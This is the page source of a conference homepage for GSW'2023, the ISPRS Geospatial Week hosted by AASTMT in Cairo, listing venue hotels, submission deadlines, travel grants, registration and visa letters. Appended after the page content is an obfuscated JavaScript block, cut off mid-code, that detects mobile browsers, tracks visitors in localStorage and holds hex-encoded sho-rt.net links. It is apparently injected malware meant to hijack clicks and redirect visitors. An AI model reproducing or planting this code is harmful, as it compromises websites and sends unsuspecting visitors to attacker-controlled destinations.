center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 